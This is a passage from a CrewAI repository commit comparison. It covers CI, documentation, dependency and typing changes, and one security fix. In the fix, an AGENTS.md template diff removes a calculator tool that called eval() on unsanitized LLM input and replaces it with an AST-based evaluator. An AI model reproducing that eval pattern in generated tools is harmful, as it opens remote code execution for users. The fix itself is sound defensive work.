Compare commits

..

9 Commits

Author SHA1 Message Date
Devin AI
ed0da4a831 fix: replace eval() with safe AST-based math evaluator in AGENTS.md template
The Calculator tool example in the AGENTS.md template used eval() on
unsanitized LLM input, creating a remote code execution vulnerability
in every new CrewAI project.

Replace eval() with an AST-based evaluator that only supports arithmetic
operators (+, -, *, /, **) and numeric literals, preventing arbitrary
code execution while preserving calculator functionality.

Closes #5056

Co-Authored-By: João <joao@crewai.com>
2026-03-25 04:03:25 +00:00
Greyson LaLonde
8a1424534e ci: run mypy on full package instead of changed files only
Some checks failed
CodeQL Advanced / Analyze (actions) (push) Has been cancelled
CodeQL Advanced / Analyze (python) (push) Has been cancelled
Build uv cache / build-cache (3.10) (push) Has been cancelled
Build uv cache / build-cache (3.11) (push) Has been cancelled
Build uv cache / build-cache (3.12) (push) Has been cancelled
Build uv cache / build-cache (3.13) (push) Has been cancelled
Nightly Canary Release / Check for new commits (push) Has been cancelled
Nightly Canary Release / Build nightly packages (push) Has been cancelled
Nightly Canary Release / Publish nightly to PyPI (push) Has been cancelled
Mark stale issues and pull requests / stale (push) Has been cancelled
2026-03-25 07:05:57 +08:00
Greyson LaLonde
b53c08812d fix: use None check instead of isinstance for memory in human feedback learn 2026-03-25 06:40:25 +08:00
Greyson LaLonde
ec8d444cfc fix: resolve all mypy errors across crewai package 2026-03-25 06:03:43 +08:00
iris-clawd
8d1edd5d65 fix: pin litellm upper bound to last tested version (1.82.6) (#5044)
Some checks failed
CodeQL Advanced / Analyze (actions) (push) Has been cancelled
CodeQL Advanced / Analyze (python) (push) Has been cancelled
Check Documentation Broken Links / Check broken links (push) Has been cancelled
The litellm optional dependency had a wide upper bound (<3) that allowed
any future litellm release to be installed automatically. This means
breaking changes in new litellm versions could affect customers immediately.

Pins the upper bound to <=1.82.6 (current latest known-good version).
When newer litellm versions are tested and validated, bump this bound
explicitly.
2026-03-24 09:38:12 -07:00
alex-clawd
7f5ffce057 feat: native OpenAI-compatible providers (OpenRouter, DeepSeek, Ollama, vLLM, Cerebras, Dashscope) (#5042)
* feat: add native OpenAI-compatible providers (OpenRouter, DeepSeek, Ollama, vLLM, Cerebras, Dashscope)

Add a data-driven OpenAI-compatible provider system that enables
native support for multiple third-party APIs that implement the
OpenAI API specification.

New providers:
- OpenRouter: 500+ models via openrouter.ai
- DeepSeek: deepseek-chat, deepseek-coder, deepseek-reasoner
- Ollama: local models (llama3, mistral, codellama, etc.)
- hosted_vllm: self-hosted vLLM servers
- Cerebras: ultra-fast inference
- Dashscope: Alibaba Qwen models (qwen-turbo, qwen-max, etc.)

Architecture:
- Single OpenAICompatibleCompletion class extends OpenAICompletion
- ProviderConfig dataclass stores per-provider settings
- Registry dict makes adding new providers a single config entry
- Handles provider-specific quirks (OpenRouter headers, Ollama
  base URL normalization, optional API keys)

Usage:
  LLM(model="deepseek/deepseek-chat")
  LLM(model="ollama/llama3")
  LLM(model="openrouter/anthropic/claude-3-opus")
  LLM(model="llama3", provider="ollama")

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>

* fix: add is_litellm=True to tests that test litellm-specific methods

Tests for _get_custom_llm_provider and _validate_call_params used
openrouter/ model prefix which now routes to native provider.
Added is_litellm=True to force litellm path since these test
litellm-specific internals.

---------

Co-authored-by: Joao Moura <joao@crewai.com>
Co-authored-by: Claude Opus 4.5 <noreply@anthropic.com>
2026-03-24 12:05:43 -03:00
iris-clawd
724ab5c5e1 fix: correct litellm quarantine wording in docs (#5041)
Removed language implying the quarantine is resolved and removed
date-specific references so the docs stay evergreen.
2026-03-24 11:43:51 -03:00
alex-clawd
82a7c364c5 refactor: decouple internal plumbing from litellm (token counting, callbacks, feature detection, errors) (#5040)
- Token counting: Make TokenCalcHandler standalone class that conditionally
  inherits from litellm.CustomLogger when litellm is available, works as
  plain object when not installed

- Callbacks: Guard set_callbacks() and set_env_callbacks() behind
  LITELLM_AVAILABLE checks - these only affect the litellm fallback path,
  native providers emit events via base_llm.py

- Feature detection: Guard supports_function_calling(), supports_stop_words(),
  and _validate_call_params() behind LITELLM_AVAILABLE checks with sensible
  defaults (True for function calling/stop words since all modern models
  support them)

- Error types: Replace litellm.exceptions.ContextWindowExceededError catches
  with pattern-based detection using LLMContextLengthExceededError._is_context_limit_error()

This decouples crewAI's internal infrastructure from litellm, allowing the
native providers (OpenAI, Anthropic, Azure, Bedrock, Gemini) to work without
litellm installed. The litellm fallback for niche providers still works when
litellm IS installed.

Co-authored-by: Joao Moura <joao@crewai.com>
Co-authored-by: Claude Opus 4.5 <noreply@anthropic.com>
2026-03-24 11:35:05 -03:00
iris-clawd
36702229d7 docs: add guide for using CrewAI without LiteLLM (#5039) 2026-03-24 11:19:02 -03:00
79 changed files with 1696 additions and 391 deletions

View File

@@ -17,8 +17,6 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Fetch all history for proper diff
- name: Restore global uv cache
id: cache-restore
@@ -42,37 +40,8 @@ jobs:
- name: Install dependencies
run: uv sync --all-groups --all-extras
- name: Get changed Python files
id: changed-files
run: |
# Get the list of changed Python files compared to the base branch
echo "Fetching changed files..."
git diff --name-only --diff-filter=ACMRT origin/${{ github.base_ref }}...HEAD -- '*.py' > changed_files.txt
# Filter for files in src/ directory only (excluding tests/)
grep -E "^src/" changed_files.txt > filtered_changed_files.txt || true
# Check if there are any changed files
if [ -s filtered_changed_files.txt ]; then
echo "Changed Python files in src/:"
cat filtered_changed_files.txt
echo "has_changes=true" >> $GITHUB_OUTPUT
# Convert newlines to spaces for mypy command
echo "files=$(cat filtered_changed_files.txt | tr '\n' ' ')" >> $GITHUB_OUTPUT
else
echo "No Python files changed in src/"
echo "has_changes=false" >> $GITHUB_OUTPUT
fi
- name: Run type checks on changed files
if: steps.changed-files.outputs.has_changes == 'true'
run: |
echo "Running mypy on changed files with Python ${{ matrix.python-version }}..."
uv run mypy ${{ steps.changed-files.outputs.files }}
- name: No files to check
if: steps.changed-files.outputs.has_changes == 'false'
run: echo "No Python files in src/ were modified - skipping type checks"
- name: Run type checks
run: uv run mypy lib/crewai/src/crewai/
- name: Save uv caches
if: steps.cache-restore.outputs.cache-hit != 'true'

View File

@@ -353,6 +353,7 @@
"en/learn/kickoff-async",
"en/learn/kickoff-for-each",
"en/learn/llm-connections",
"en/learn/litellm-removal-guide",
"en/learn/multimodal-agents",
"en/learn/replay-tasks-from-latest-crew-kickoff",
"en/learn/sequential-process",
@@ -820,6 +821,7 @@
"en/learn/kickoff-async",
"en/learn/kickoff-for-each",
"en/learn/llm-connections",
"en/learn/litellm-removal-guide",
"en/learn/multimodal-agents",
"en/learn/replay-tasks-from-latest-crew-kickoff",
"en/learn/sequential-process",
@@ -1287,6 +1289,7 @@
"en/learn/kickoff-async",
"en/learn/kickoff-for-each",
"en/learn/llm-connections",
"en/learn/litellm-removal-guide",
"en/learn/multimodal-agents",
"en/learn/replay-tasks-from-latest-crew-kickoff",
"en/learn/sequential-process",
@@ -1755,6 +1758,7 @@
"en/learn/kickoff-async",
"en/learn/kickoff-for-each",
"en/learn/llm-connections",
"en/learn/litellm-removal-guide",
"en/learn/multimodal-agents",
"en/learn/replay-tasks-from-latest-crew-kickoff",
"en/learn/sequential-process",

View File

@@ -0,0 +1,358 @@
---
title: Using CrewAI Without LiteLLM
description: How to use CrewAI with native provider integrations and remove the LiteLLM dependency from your project.
icon: shield-check
mode: "wide"
---
## Overview
CrewAI supports two paths for connecting to LLM providers:
1. **Native integrations** — direct SDK connections to OpenAI, Anthropic, Google Gemini, Azure OpenAI, and AWS Bedrock
2. **LiteLLM fallback** — a translation layer that supports 100+ additional providers
This guide explains how to use CrewAI exclusively with native provider integrations, removing any dependency on LiteLLM.
<Warning>
The `litellm` package was quarantined on PyPI due to a security/reliability incident. If you rely on LiteLLM-dependent providers, you should migrate to native integrations. CrewAI's native integrations give you full functionality without LiteLLM.
</Warning>
## Why Remove LiteLLM?
- **Reduced dependency surface** — fewer packages means fewer potential supply-chain risks
- **Better performance** — native SDKs communicate directly with provider APIs, eliminating a translation layer
- **Simpler debugging** — one less abstraction layer between your code and the provider
- **Smaller install footprint** — LiteLLM brings in many transitive dependencies
## Native Providers (No LiteLLM Required)
These providers use their own SDKs and work without LiteLLM installed:
<CardGroup cols={2}>
<Card title="OpenAI" icon="bolt">
GPT-4o, GPT-4o-mini, o1, o3-mini, and more.
```bash
uv add "crewai[openai]"
```
</Card>
<Card title="Anthropic" icon="a">
Claude Sonnet, Claude Haiku, and more.
```bash
uv add "crewai[anthropic]"
```
</Card>
<Card title="Google Gemini" icon="google">
Gemini 2.0 Flash, Gemini 2.0 Pro, and more.
```bash
uv add "crewai[gemini]"
```
</Card>
<Card title="Azure OpenAI" icon="microsoft">
Azure-hosted OpenAI models.
```bash
uv add "crewai[azure]"
```
</Card>
<Card title="AWS Bedrock" icon="aws">
Claude, Llama, Titan, and more via AWS.
```bash
uv add "crewai[bedrock]"
```
</Card>
</CardGroup>
<Info>
If you only use native providers, you **never** need to install `crewai[litellm]`. The base `crewai` package plus your chosen provider extra is all you need.
</Info>
## How to Check If You're Using LiteLLM
### Check your model strings
If your code uses model prefixes like these, you're routing through LiteLLM:
| Prefix | Provider | Uses LiteLLM? |
|--------|----------|---------------|
| `ollama/` | Ollama | ✅ Yes |
| `groq/` | Groq | ✅ Yes |
| `together_ai/` | Together AI | ✅ Yes |
| `mistral/` | Mistral | ✅ Yes |
| `cohere/` | Cohere | ✅ Yes |
| `huggingface/` | Hugging Face | ✅ Yes |
| `openai/` | OpenAI | ❌ Native |
| `anthropic/` | Anthropic | ❌ Native |
| `gemini/` | Google Gemini | ❌ Native |
| `azure/` | Azure OpenAI | ❌ Native |
| `bedrock/` | AWS Bedrock | ❌ Native |
### Check if LiteLLM is installed
```bash
# Using pip
pip show litellm
# Using uv
uv pip show litellm
```
If the command returns package information, LiteLLM is installed in your environment.
### Check your dependencies
Look at your `pyproject.toml` for `crewai[litellm]`:
```toml
# If you see this, you have LiteLLM as a dependency
dependencies = [
"crewai[litellm]>=0.100.0", # ← Uses LiteLLM
]
# Change to a native provider extra instead
dependencies = [
"crewai[openai]>=0.100.0", # ← Native, no LiteLLM
]
```
## Migration Guide
### Step 1: Identify your current provider
Find all `LLM()` calls and model strings in your code:
```bash
# Search your codebase for LLM model strings
grep -r "LLM(" --include="*.py" .
grep -r "llm=" --include="*.yaml" .
grep -r "llm:" --include="*.yaml" .
```
### Step 2: Switch to a native provider
<Tabs>
<Tab title="Switch to OpenAI">
```python
from crewai import LLM
# Before (LiteLLM):
# llm = LLM(model="groq/llama-3.1-70b")
# After (Native):
llm = LLM(model="openai/gpt-4o")
```
```bash
# Install
uv add "crewai[openai]"
# Set your API key
export OPENAI_API_KEY="sk-..."
```
</Tab>
<Tab title="Switch to Anthropic">
```python
from crewai import LLM
# Before (LiteLLM):
# llm = LLM(model="together_ai/meta-llama/Meta-Llama-3.1-70B")
# After (Native):
llm = LLM(model="anthropic/claude-sonnet-4-20250514")
```
```bash
# Install
uv add "crewai[anthropic]"
# Set your API key
export ANTHROPIC_API_KEY="sk-ant-..."
```
</Tab>
<Tab title="Switch to Gemini">
```python
from crewai import LLM
# Before (LiteLLM):
# llm = LLM(model="mistral/mistral-large-latest")
# After (Native):
llm = LLM(model="gemini/gemini-2.0-flash")
```
```bash
# Install
uv add "crewai[gemini]"
# Set your API key
export GEMINI_API_KEY="..."
```
</Tab>
<Tab title="Switch to Azure OpenAI">
```python
from crewai import LLM
# After (Native):
llm = LLM(
model="azure/your-deployment-name",
api_key="your-azure-api-key",
base_url="https://your-resource.openai.azure.com",
api_version="2024-06-01"
)
```
```bash
# Install
uv add "crewai[azure]"
```
</Tab>
<Tab title="Switch to AWS Bedrock">
```python
from crewai import LLM
# After (Native):
llm = LLM(
model="bedrock/anthropic.claude-3-5-sonnet-20241022-v2:0",
aws_region_name="us-east-1"
)
```
```bash
# Install
uv add "crewai[bedrock]"
# Configure AWS credentials
export AWS_ACCESS_KEY_ID="..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_DEFAULT_REGION="us-east-1"
```
</Tab>
</Tabs>
### Step 3: Keep Ollama without LiteLLM
If you're using Ollama and want to keep using it, you can connect via Ollama's OpenAI-compatible API:
```python
from crewai import LLM
# Before (LiteLLM):
# llm = LLM(model="ollama/llama3")
# After (OpenAI-compatible mode, no LiteLLM needed):
llm = LLM(
model="openai/llama3",
base_url="http://localhost:11434/v1",
api_key="ollama" # Ollama doesn't require a real API key
)
```
<Tip>
Many local inference servers (Ollama, vLLM, LM Studio, llama.cpp) expose an OpenAI-compatible API. You can use the `openai/` prefix with a custom `base_url` to connect to any of them natively.
</Tip>
### Step 4: Update your YAML configs
```yaml
# Before (LiteLLM providers):
researcher:
role: Research Specialist
goal: Conduct research
backstory: A dedicated researcher
llm: groq/llama-3.1-70b # ← LiteLLM
# After (Native provider):
researcher:
role: Research Specialist
goal: Conduct research
backstory: A dedicated researcher
llm: openai/gpt-4o # ← Native
```
### Step 5: Remove LiteLLM
Once you've migrated all your model references:
```bash
# Remove litellm from your project
uv remove litellm
# Or if using pip
pip uninstall litellm
# Update your pyproject.toml: change crewai[litellm] to your provider extra
# e.g., crewai[openai], crewai[anthropic], crewai[gemini]
```
### Step 6: Verify
Run your project and confirm everything works:
```bash
# Run your crew
crewai run
# Or run your tests
uv run pytest
```
## Quick Reference: Model String Mapping
Here are common migration paths from LiteLLM-dependent providers to native ones:
```python
from crewai import LLM
# ─── LiteLLM providers → Native alternatives ────────────────────
# Groq → OpenAI or Anthropic
# llm = LLM(model="groq/llama-3.1-70b")
llm = LLM(model="openai/gpt-4o-mini") # Fast & affordable
llm = LLM(model="anthropic/claude-haiku-3-5") # Fast & affordable
# Together AI → OpenAI or Gemini
# llm = LLM(model="together_ai/meta-llama/Meta-Llama-3.1-70B")
llm = LLM(model="openai/gpt-4o") # High quality
llm = LLM(model="gemini/gemini-2.0-flash") # Fast & capable
# Mistral → Anthropic or OpenAI
# llm = LLM(model="mistral/mistral-large-latest")
llm = LLM(model="anthropic/claude-sonnet-4-20250514") # High quality
# Ollama → OpenAI-compatible (keep using local models)
# llm = LLM(model="ollama/llama3")
llm = LLM(
model="openai/llama3",
base_url="http://localhost:11434/v1",
api_key="ollama"
)
```
## FAQ
<AccordionGroup>
<Accordion title="Do I lose any functionality by removing LiteLLM?">
No, if you use one of the five natively supported providers (OpenAI, Anthropic, Gemini, Azure, Bedrock). These native integrations support all CrewAI features including streaming, tool calling, structured output, and more. You only lose access to providers that are exclusively available through LiteLLM (like Groq, Together AI, Mistral as first-class providers).
</Accordion>
<Accordion title="Can I use multiple native providers at the same time?">
Yes. Install multiple extras and use different providers for different agents:
```bash
uv add "crewai[openai,anthropic,gemini]"
```
```python
researcher = Agent(llm="openai/gpt-4o", ...)
writer = Agent(llm="anthropic/claude-sonnet-4-20250514", ...)
```
</Accordion>
<Accordion title="Is LiteLLM safe to use now?">
Regardless of quarantine status, reducing your dependency surface is good security practice. If you only need providers that CrewAI supports natively, there's no reason to keep LiteLLM installed.
</Accordion>
<Accordion title="What about environment variables like OPENAI_API_KEY?">
Native providers use the same environment variables you're already familiar with. No changes needed for `OPENAI_API_KEY`, `ANTHROPIC_API_KEY`, `GEMINI_API_KEY`, etc.
</Accordion>
</AccordionGroup>
## Related Resources
- [LLM Connections](/en/learn/llm-connections) — Full guide to connecting CrewAI with any LLM
- [LLM Concepts](/en/concepts/llms) — Understanding LLMs in CrewAI
- [LLM Selection Guide](/en/learn/llm-selection-guide) — Choosing the right model for your use case

View File

@@ -83,7 +83,7 @@ voyageai = [
"voyageai~=0.3.5",
]
litellm = [
"litellm>=1.74.9,<3",
"litellm>=1.74.9,<=1.82.6",
]
bedrock = [
"boto3~=1.40.45",

View File

@@ -5,9 +5,12 @@ from __future__ import annotations
from abc import ABC, abstractmethod
import json
import re
from typing import TYPE_CHECKING, Any, Final, Literal
from typing import TYPE_CHECKING, Final, Literal
from crewai.utilities.pydantic_schema_utils import generate_model_description
from crewai.utilities.pydantic_schema_utils import (
ModelDescription,
generate_model_description,
)
if TYPE_CHECKING:
@@ -41,7 +44,7 @@ class BaseConverterAdapter(ABC):
"""
self.agent_adapter = agent_adapter
self._output_format: Literal["json", "pydantic"] | None = None
self._schema: dict[str, Any] | None = None
self._schema: ModelDescription | None = None
@abstractmethod
def configure_structured_output(self, task: Task) -> None:
@@ -128,7 +131,7 @@ class BaseConverterAdapter(ABC):
@staticmethod
def _configure_format_from_task(
task: Task,
) -> tuple[Literal["json", "pydantic"] | None, dict[str, Any] | None]:
) -> tuple[Literal["json", "pydantic"] | None, ModelDescription | None]:
"""Determine output format and schema from task requirements.
This is a helper method that examines the task's output requirements

View File

@@ -64,7 +64,7 @@ class LangGraphAgentAdapter(BaseAgentAdapter):
llm: Any = None,
max_iterations: int = 10,
agent_config: dict[str, Any] | None = None,
**kwargs,
**kwargs: Any,
) -> None:
"""Initialize the LangGraph agent adapter.

View File

@@ -948,7 +948,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
)
error_event_emitted = False
track_delegation_if_needed(func_name, args_dict, self.task)
track_delegation_if_needed(func_name, args_dict or {}, self.task)
structured_tool: CrewStructuredTool | None = None
if original_tool is not None:
@@ -965,7 +965,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
hook_blocked = False
before_hook_context = ToolCallHookContext(
tool_name=func_name,
tool_input=args_dict,
tool_input=args_dict or {},
tool=structured_tool, # type: ignore[arg-type]
agent=self.agent,
task=self.task,
@@ -991,7 +991,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
result = f"Tool '{func_name}' has reached its usage limit of {original_tool.max_usage_count} times and cannot be used anymore."
elif not from_cache and func_name in available_functions:
try:
raw_result = available_functions[func_name](**args_dict)
raw_result = available_functions[func_name](**(args_dict or {}))
if self.tools_handler and self.tools_handler.cache:
should_cache = True
@@ -1001,7 +1001,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
and callable(original_tool.cache_function)
):
should_cache = original_tool.cache_function(
args_dict, raw_result
args_dict or {}, raw_result
)
if should_cache:
self.tools_handler.cache.add(
@@ -1030,7 +1030,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
after_hook_context = ToolCallHookContext(
tool_name=func_name,
tool_input=args_dict,
tool_input=args_dict or {},
tool=structured_tool, # type: ignore[arg-type]
agent=self.agent,
task=self.task,

View File

@@ -77,7 +77,7 @@ CLI_SETTINGS_KEYS = [
]
# Default values for CLI settings
DEFAULT_CLI_SETTINGS = {
DEFAULT_CLI_SETTINGS: dict[str, Any] = {
"enterprise_base_url": DEFAULT_CREWAI_ENTERPRISE_URL,
"oauth2_provider": CREWAI_ENTERPRISE_DEFAULT_OAUTH2_PROVIDER,
"oauth2_audience": CREWAI_ENTERPRISE_DEFAULT_OAUTH2_AUDIENCE,

View File

@@ -173,13 +173,13 @@ class MemoryTUI(App[None]):
info = self._memory.info("/")
tree.root.label = f"/ ({info.record_count} records)"
tree.root.data = "/"
self._add_children(tree.root, "/", depth=0, max_depth=3)
self._add_scope_children(tree.root, "/", depth=0, max_depth=3)
tree.root.expand()
return tree
def _add_children(
def _add_scope_children(
self,
parent_node: Tree.Node[str],
parent_node: Any,
path: str,
depth: int,
max_depth: int,
@@ -191,7 +191,7 @@ class MemoryTUI(App[None]):
child_info = self._memory.info(child)
label = f"{child} ({child_info.record_count})"
node = parent_node.add(label, data=child)
self._add_children(node, child, depth + 1, max_depth)
self._add_scope_children(node, child, depth + 1, max_depth)
# -- Populating the OptionList -------------------------------------------

View File

@@ -1,4 +1,5 @@
import subprocess
from typing import Any
import click
@@ -6,7 +7,7 @@ from crewai.cli.utils import get_crews, get_flows
from crewai.flow import Flow
def _reset_flow_memory(flow: Flow) -> None:
def _reset_flow_memory(flow: Flow[Any]) -> None:
"""Reset memory for a single flow instance.
Handles Memory, MemoryScope (both have .reset()), and MemorySlice

View File

@@ -765,12 +765,39 @@ class CustomSearchTool(BaseTool):
### Using @tool Decorator
```python
import ast
import operator
from crewai.tools import tool
@tool("Calculator")
def calculator(expression: str) -> str:
"""Evaluates a mathematical expression and returns the result."""
return str(eval(expression))
"""Evaluates a mathematical expression and returns the result.
Supports +, -, *, /, ** and parentheses on numeric values.
"""
ops = {
ast.Add: operator.add,
ast.Sub: operator.sub,
ast.Mult: operator.mul,
ast.Div: operator.truediv,
ast.Pow: operator.pow,
ast.USub: operator.neg,
}
def _safe_eval(node):
if isinstance(node, ast.Expression):
return _safe_eval(node.body)
elif isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
return node.value
elif isinstance(node, ast.BinOp) and type(node.op) in ops:
return ops[type(node.op)](_safe_eval(node.left), _safe_eval(node.right))
elif isinstance(node, ast.UnaryOp) and type(node.op) in ops:
return ops[type(node.op)](_safe_eval(node.operand))
raise ValueError(f"Unsupported expression: {ast.dump(node)}")
tree = ast.parse(expression, mode="eval")
return str(_safe_eval(tree))
```
### Built-in Tools (install with `uv add crewai-tools`)

View File

@@ -1,5 +1,6 @@
import os
import shutil
from typing import Any
import tomli_w
@@ -11,7 +12,7 @@ def update_crew() -> None:
migrate_pyproject("pyproject.toml", "pyproject.toml")
def migrate_pyproject(input_file, output_file):
def migrate_pyproject(input_file: str, output_file: str) -> None:
"""
Migrate the pyproject.toml to the new format.
@@ -23,8 +24,7 @@ def migrate_pyproject(input_file, output_file):
# Read the input pyproject.toml
pyproject_data = read_toml()
# Initialize the new project structure
new_pyproject = {
new_pyproject: dict[str, Any] = {
"project": {},
"build-system": {"requires": ["hatchling"], "build-backend": "hatchling.build"},
}

View File

@@ -386,7 +386,7 @@ def fetch_crews(module_attr: Any) -> list[Crew]:
return crew_instances
def get_flow_instance(module_attr: Any) -> Flow | None:
def get_flow_instance(module_attr: Any) -> Flow[Any] | None:
"""Check if a module attribute is a user-defined Flow subclass and return an instance.
Args:
@@ -413,7 +413,7 @@ _SKIP_DIRS = frozenset(
)
def get_flows(flow_path: str = "main.py") -> list[Flow]:
def get_flows(flow_path: str = "main.py") -> list[Flow[Any]]:
"""Get the flow instances from project files.
Walks the project directory looking for files matching ``flow_path``
@@ -427,7 +427,7 @@ def get_flows(flow_path: str = "main.py") -> list[Flow]:
Returns:
A list of discovered Flow instances.
"""
flow_instances: list[Flow] = []
flow_instances: list[Flow[Any]] = []
try:
current_dir = os.getcwd()
if current_dir not in sys.path:

View File

@@ -45,14 +45,14 @@ class CrewOutput(BaseModel):
output_dict.update(self.pydantic.model_dump())
return output_dict
def __getitem__(self, key):
def __getitem__(self, key: str) -> Any:
if self.pydantic and hasattr(self.pydantic, key):
return getattr(self.pydantic, key)
if self.json_dict and key in self.json_dict:
return self.json_dict[key]
raise KeyError(f"Key '{key}' not found in CrewOutput.")
def __str__(self):
def __str__(self) -> str:
if self.pydantic:
return str(self.pydantic)
if self.json_dict:

View File

@@ -6,6 +6,7 @@ handlers execute in correct order while maximizing parallelism.
from collections import defaultdict, deque
from collections.abc import Sequence
from typing import Any
from crewai.events.depends import Depends
from crewai.events.types.event_bus_types import ExecutionPlan, Handler
@@ -45,7 +46,7 @@ class HandlerGraph:
def __init__(
self,
handlers: dict[Handler, list[Depends]],
handlers: dict[Handler, list[Depends[Any]]],
) -> None:
"""Initialize the dependency graph.
@@ -103,7 +104,7 @@ class HandlerGraph:
def build_execution_plan(
handlers: Sequence[Handler],
dependencies: dict[Handler, list[Depends]],
dependencies: dict[Handler, list[Depends[Any]]],
) -> ExecutionPlan:
"""Build an execution plan from handlers and their dependencies.
@@ -118,7 +119,7 @@ def build_execution_plan(
Raises:
CircularDependencyError: If circular dependencies are detected
"""
handler_dict: dict[Handler, list[Depends]] = {
handler_dict: dict[Handler, list[Depends[Any]]] = {
h: dependencies.get(h, []) for h in handlers
}

View File

@@ -65,9 +65,9 @@ class FirstTimeTraceHandler:
self._gracefully_fail(f"Error in trace handling: {e}")
mark_first_execution_completed(user_consented=False)
def _initialize_backend_and_send_events(self):
def _initialize_backend_and_send_events(self) -> None:
"""Initialize backend batch and send collected events."""
if not self.batch_manager:
if not self.batch_manager or not self.batch_manager.trace_batch_id:
return
try:
@@ -115,12 +115,13 @@ class FirstTimeTraceHandler:
except Exception as e:
self._gracefully_fail(f"Backend initialization failed: {e}")
def _display_ephemeral_trace_link(self):
def _display_ephemeral_trace_link(self) -> None:
"""Display the ephemeral trace link to the user and automatically open browser."""
console = Console()
try:
webbrowser.open(self.ephemeral_url)
if self.ephemeral_url:
webbrowser.open(self.ephemeral_url)
except Exception: # noqa: S110
pass
@@ -158,7 +159,7 @@ To disable tracing later, do any one of these:
console.print(panel)
console.print()
def _show_tracing_declined_message(self):
def _show_tracing_declined_message(self) -> None:
"""Show message when user declines tracing."""
console = Console()
@@ -184,15 +185,18 @@ To enable tracing later, do any one of these:
console.print(panel)
console.print()
def _gracefully_fail(self, error_message: str):
def _gracefully_fail(self, error_message: str) -> None:
"""Handle errors gracefully without disrupting user experience."""
console = Console()
console.print(f"[yellow]Note: {error_message}[/yellow]")
logger.debug(f"First-time trace error: {error_message}")
def _show_local_trace_message(self):
def _show_local_trace_message(self) -> None:
"""Show message when traces were collected locally but couldn't be uploaded."""
if self.batch_manager is None:
return
console = Console()
panel_content = f"""

View File

@@ -6,6 +6,7 @@ from collections.abc import Sequence
from typing import Any
from pydantic import ConfigDict, model_validator
from typing_extensions import Self
from crewai.agents.agent_builder.base_agent import BaseAgent
from crewai.events.base_events import BaseEvent
@@ -25,16 +26,9 @@ class AgentExecutionStartedEvent(BaseEvent):
model_config = ConfigDict(arbitrary_types_allowed=True)
@model_validator(mode="after")
def set_fingerprint_data(self):
def set_fingerprint_data(self) -> Self:
"""Set fingerprint data from the agent if available."""
if hasattr(self.agent, "fingerprint") and self.agent.fingerprint:
self.source_fingerprint = self.agent.fingerprint.uuid_str
self.source_type = "agent"
if (
hasattr(self.agent.fingerprint, "metadata")
and self.agent.fingerprint.metadata
):
self.fingerprint_metadata = self.agent.fingerprint.metadata
_set_agent_fingerprint(self, self.agent)
return self
@@ -49,16 +43,9 @@ class AgentExecutionCompletedEvent(BaseEvent):
model_config = ConfigDict(arbitrary_types_allowed=True)
@model_validator(mode="after")
def set_fingerprint_data(self):
def set_fingerprint_data(self) -> Self:
"""Set fingerprint data from the agent if available."""
if hasattr(self.agent, "fingerprint") and self.agent.fingerprint:
self.source_fingerprint = self.agent.fingerprint.uuid_str
self.source_type = "agent"
if (
hasattr(self.agent.fingerprint, "metadata")
and self.agent.fingerprint.metadata
):
self.fingerprint_metadata = self.agent.fingerprint.metadata
_set_agent_fingerprint(self, self.agent)
return self
@@ -73,16 +60,9 @@ class AgentExecutionErrorEvent(BaseEvent):
model_config = ConfigDict(arbitrary_types_allowed=True)
@model_validator(mode="after")
def set_fingerprint_data(self):
def set_fingerprint_data(self) -> Self:
"""Set fingerprint data from the agent if available."""
if hasattr(self.agent, "fingerprint") and self.agent.fingerprint:
self.source_fingerprint = self.agent.fingerprint.uuid_str
self.source_type = "agent"
if (
hasattr(self.agent.fingerprint, "metadata")
and self.agent.fingerprint.metadata
):
self.fingerprint_metadata = self.agent.fingerprint.metadata
_set_agent_fingerprint(self, self.agent)
return self
@@ -140,3 +120,13 @@ class AgentEvaluationFailedEvent(BaseEvent):
iteration: int
error: str
type: str = "agent_evaluation_failed"
def _set_agent_fingerprint(event: BaseEvent, agent: BaseAgent) -> None:
"""Set fingerprint data on an event from an agent object."""
fp = agent.security_config.fingerprint
if fp is not None:
event.source_fingerprint = fp.uuid_str
event.source_type = "agent"
if fp.metadata:
event.fingerprint_metadata = fp.metadata

View File

@@ -15,21 +15,18 @@ class CrewBaseEvent(BaseEvent):
crew_name: str | None
crew: Crew | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
self.set_crew_fingerprint()
self._set_crew_fingerprint()
def set_crew_fingerprint(self) -> None:
if self.crew and hasattr(self.crew, "fingerprint") and self.crew.fingerprint:
def _set_crew_fingerprint(self) -> None:
if self.crew is not None and self.crew.fingerprint:
self.source_fingerprint = self.crew.fingerprint.uuid_str
self.source_type = "crew"
if (
hasattr(self.crew.fingerprint, "metadata")
and self.crew.fingerprint.metadata
):
if self.crew.fingerprint.metadata:
self.fingerprint_metadata = self.crew.fingerprint.metadata
def to_json(self, exclude: set[str] | None = None):
def to_json(self, exclude: set[str] | None = None) -> Any:
if exclude is None:
exclude = set()
exclude.add("crew")

View File

@@ -11,7 +11,7 @@ class KnowledgeEventBase(BaseEvent):
agent_role: str | None = None
agent_id: str | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
self._set_agent_params(data)
self._set_task_params(data)

View File

@@ -13,7 +13,7 @@ class LLMGuardrailBaseEvent(BaseEvent):
agent_role: str | None = None
agent_id: str | None = None
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
super().__init__(**data)
self._set_agent_params(data)
self._set_task_params(data)
@@ -28,10 +28,10 @@ class LLMGuardrailStartedEvent(LLMGuardrailBaseEvent):
"""
type: str = "llm_guardrail_started"
guardrail: str | Callable
guardrail: str | Callable[..., Any]
retry_count: int
def __init__(self, **data):
def __init__(self, **data: Any) -> None:
from crewai.tasks.hallucination_guardrail import HallucinationGuardrail
from crewai.tasks.llm_guardrail import LLMGuardrail
@@ -39,7 +39,7 @@ class LLMGuardrailStartedEvent(LLMGuardrailBaseEvent):
if isinstance(self.guardrail, (LLMGuardrail, HallucinationGuardrail)):
self.guardrail = self.guardrail.description.strip()
elif isinstance(self.guardrail, Callable):
elif callable(self.guardrail):
self.guardrail = getsource(self.guardrail).strip()

View File

@@ -15,7 +15,7 @@ class MCPEvent(BaseEvent):
